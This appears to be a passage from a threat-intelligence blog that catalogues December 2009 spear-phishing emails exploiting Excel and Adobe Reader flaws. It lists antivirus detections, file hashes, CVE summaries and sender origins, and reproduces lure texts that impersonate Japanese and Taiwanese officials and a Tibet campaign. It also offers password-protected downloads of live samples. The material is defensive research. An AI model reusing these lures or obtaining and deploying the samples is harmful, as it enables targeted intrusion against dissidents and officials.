BitDefender    7.2    2010.05.24    Exploit.PDF-JS.Gen
CAT-QuickHeal    10.00    2010.05.21    Exploit.PDF.FlateDecode
ClamAV    0.96.0.3-git    2010.05.22    Exploit.PDF-6260
Comodo    4927    2010.05.24    UnclassifiedMalware
DrWeb    5.0.2.03300    2010.05.24    Exploit.PDF.687
eTrust-Vet    35.2.7503    2010.05.21    PDF/Pidief.G!generic
F-Prot    4.6.0.103    2010.05.23    PDF/Pidief.BO
F-Secure    9.0.15370.0    2010.05.23    Exploit.PDF-JS.Gen
GData    21    2010.05.24    Exploit.PDF-JS.Gen
Ikarus    T3.1.1.84.0    2010.05.24    Exploit.JS.Pdfka
Kaspersky    7.0.0.125    2010.05.23    Exploit.JS.Pdfka.adn
McAfee    5.400.0.1158    2010.05.24    Exploit-PDF.b
McAfee-GW-Edition    2010.1    2010.05.23    Exploit-PDF.b
Microsoft    1.5802    2010.05.24    Exploit:JS/Heapspray
Norman    6.04.12    2010.05.23    JS/Shellcode.HQ
nProtect    2010-05-23.01    2010.05.23    Exploit.PDF-JS.Gen
PCTools    7.0.3.5    2010.05.24    Trojan.Pidief
Sophos    4.53.0    2010.05.24    Troj/PDFJs-GQ
Sunbelt    6346    2010.05.24    Trojan.PDF.Pidief.b (v)
Symantec    20101.1.0.89    2010.05.24    Trojan.Pidief
Additional information
File size: 890083 bytes
MD5...: 115a25093cb9062cc155508cdf878ace


Wepawet
benign
http://wepawet.cs.ucsb.edu/view.php?hash=115a25093cb9062cc155508cdf878ace&type=js

Dec. 29 CVE-2008-3005 / MS08-043 Darkmoon RAT Excel Russia Foreign Minister Meeting from spoofed daisuke_hasegawa@mofa.go.jp Dec 2009 06:50:10 -0000

• CVE-2008-3005  Array index vulnerability in Microsoft Office Excel 2000 SP3 and 2002 SP3, and Office 2004 and 2008 for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted array index for a FORMAT record, aka the "Excel Index Array Vulnerability."
  
• MS08-043 – Critical  This security update resolves four privately reported vulnerabilities in Microsoft Office Excel that could allow remote code execution. An attacker ... could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
• Critical for Excel 2000 SP3
  Important for Excel 2002 SP3, Excel 2003 SP2, Excel 2003 SP3, Excel Viewer 2003, Excel Viewer 2003 SP3, Excel 2007, Excel 2007 SP1, Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats S1, Excel Viewer, and Microsoft Office SharePoint Server 2007.

Download the infected Excel file 1229.xls plus extracted bin files as 1229+bin files.zip (password protected archive, you need to contact me for the password)

Details: 1229.xls - 0e4e3c2d84a9bc726a50b3c91346fbb1   

            

This message was received from a spoofed email address of an official at the Foreign Ministry of Japan. The message came from China, it is crafted to install a remote administration tool known as Darkmoon (similar to  ProRAT). I will post more details as soon as I can.

  12月28日、岡田大臣は、モスクワにおいて、ラヴロフ外務大臣と日露外相会談を行うと共に、ナルィシュキン大統領府長官と会談したところ、結果概要は以下のとおり。

      【ポイント】

    ●外相会談において、岡田大臣から、鳩山政権として政治と経済を車の両輪のように前進させたい、日露行動計画に基づき日露関係が進む一方、領土の帰属の問題について目に見える進展がない、領土問題について具体的な前進が図れるよう外相レベルでも努力しなくてはならない、ロシア側に帰属の問題について日本の立場を踏まえる形での対応を求めたい旨発言。

    ●ラヴロフ外相は、ロシア外交にとって日本との外交は優先事項であると説明しつつ、領土問題に関し、人為的に解決を遅らせるつもりはない、国際法及び第２次大戦の結果を踏まえる必要があると述べつつ、ロシア側の原則的立場を説明。

....................... see the full text in the end of the post. The text is actually copied from the website of the Foreign Ministry of Japan (here is the page from the Google cache)

         ------------------------------------------------
    Daisuke HASEGAWA
    International Counter-Terrorism Cooperation Division Foreign Policy Bureau, Ministry of Foreign Affairs
    TEL: 03-5501-8000 ext.4180, FAX: 03-5501-8205 daisuke_hasegawa@mofa.go.jp

Dec. 28 CVE-2009-4324 Adobe 0-day "consumer welfare table" from gwsm01@gwsm.gov.tw Mon, 28 Dec 2009 22:08:05 +0800

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download  CVE-2009-4324 samples (Password protected archives. Use the same password you used on the samples above or contact me for the password)

Download dropped binaries ((Password protected archives. Use the same password you used on the samples above or contact me for the password)

Details: 99年(春節)消費者福利表.pdf -  c61c231d93d3bd690dd04b6de7350abb

From: 國防部福利總處 [mailto:gwsm01@gwsm.gov.tw]
Sent: 2009-12-28 8:03 AM
To: xxxxxx
Subject: 檢送國防部福利總處99年(春節)消費者福利表文件乙份,請查照!

詳情登陸國防部福利總處 http://www.gwsm.gov.tw/

服務專線： (02)2392-2377
地址：臺北市信義路一段3號
郵政信箱：台北郵政90036號信箱
網頁維護：綜合資訊組　分機：709

Dec. 28 CVE-2009-4324 Adobe 0 Day best wishes from delaney955@yahoo.com Mon, 28 Dec 2009 22:28:01 PST

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download CVE-2009-4324 samples. (Password protected archive. Use the same password you used on the CVE-2009-4324 samples or contact me for the password)

Details: best wishes.pdf - 4661f1f3553899edd953e448bcab3078

There are many poorly written postcards for this zero day CVE-2009-4324, here is one more and probably the last one.

From: Delaney Kay [mailto:delaney955@yahoo.com]
Sent: Tuesday, December 29, 2009 1:28 AM
To: delaney955@yahoo.com
Subject: Subject: best wishes

   Wishing  you  and  your family a happy and safe
 holiday seasion  and productivein 2010. Keep in turch. 

Dec.26 CVE-2009-4324 Adobe 0 Day Christmas Greetings from H.H. the Dalai Lama from test01@humanright-watch.org Sat, 26 Dec 2009 20:58:47 +0800

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download CVE-2009-4324 files (Password protected archive. Use the same password you used on the samples above or contact me for the password)

Details: Greetings.pdf -2a7b8180da2906c9889f13fa912df6a0 

From: test01@humanright-watch.org on behalf of Kate Saunders [kates@ictibet.org]
Sent: Sat 12/26/2009 8:02 AM
To:
Subject Christmas Greetings from H.H. the Dalai Lama
Attachment Greetings.pdf (81 KB)

Dear Friend of Tibet. Sincerely thank you for the support of the Free Tibet Campaign. I extend you Christmas blessings on behalf of the Dalai Lama. Attachment is a letter sent to you from H.H. the Dalai Lama.
Tashi Delek!

Kate Saunders.ICT
1852 Jefferson Place NW
Washington, DC 20036
Tel 1-202-580-6716
Cell:1-202-375-4398
emai1:kates@ictibet.org
www.savetibet.org


 Sender(see header in the end of the post) Sat, 26 Dec 2009 20:58:47 +0800 (CST)
Received: from krilwftlv (203186054193.static.ctinets.com [203.186.54.193]

Hostname:203186054193.static.ctinets.com

ISP:City Telecom (H.K.) Ltd.

Organization:FIRST NETWORK COMMUNICATIONS LTD - FAVOR INDUSTRIA

Country:Hong Kong

Central District